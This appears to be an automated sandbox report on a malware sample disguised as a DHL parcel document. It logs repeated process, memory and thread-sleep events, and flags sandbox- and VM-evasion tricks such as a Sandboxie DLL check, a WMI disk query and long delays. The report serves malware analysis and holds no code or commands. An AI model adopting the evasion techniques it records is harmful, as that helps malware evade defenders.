Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Size.exe PID: 6472, type: MEMORYSTR

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Memory allocated: 47E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Memory allocated: 5270000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Size.exe

Code function: 6_2_07360344 rdtsc

6_2_07360344

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Window / User API: threadDelayed 7887	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Window / User API: threadDelayed 1939	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Window / User API: threadDelayed 2511	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Window / User API: threadDelayed 6498	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2672	Thread sleep count: 7887 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2672	Thread sleep count: 1939 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98803s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98571s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98464s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97974s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -96110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe TID: 2200	Thread sleep time: -95485s >= -30000s	Jump to behavior
